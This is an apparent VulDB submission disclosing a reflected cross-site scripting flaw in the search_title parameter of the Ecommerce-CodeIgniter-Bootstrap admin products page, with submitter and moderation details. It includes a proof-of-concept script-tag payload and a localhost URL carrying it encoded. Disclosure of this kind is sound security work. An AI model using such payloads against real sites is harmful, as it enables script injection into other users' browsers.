| Title | CodeIgniter Foundation Codeigniter 3.1.13 Cross Site Scripting |
|---|
| Description | An XSS (Cross-Site Scripting) vulnerability was identified in the search_title parameter of the web application. This vulnerability allows an attacker to inject arbitrary JavaScript code, which can be executed in the context of the user's browser.
Proof of Concept:
The following payload was used to demonstrate the vulnerability:
`"/<script><script>alert(1)</script>/"
http://localhost/ecomerce/admin/products?search_title=%22%2F%3Cscript%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%2F%22` |
|---|
| Source | ⚠️ https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap/issues/263 |
|---|
| User | evilcode52 (UID 71460) |
|---|
| Submission | 07/04/2024 02:37 AM (11 months ago) |
|---|
| Moderation | 07/05/2024 07:43 AM (1 day later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 270369 [CodeIgniter Ecommerce-CodeIgniter-Bootstrap up to 1998845073cf433bc6c250b0354461fbd84d0e03 search_title/catName/sub/name/categorie cross site scripting] |
|---|
| Points | 20 |
|---|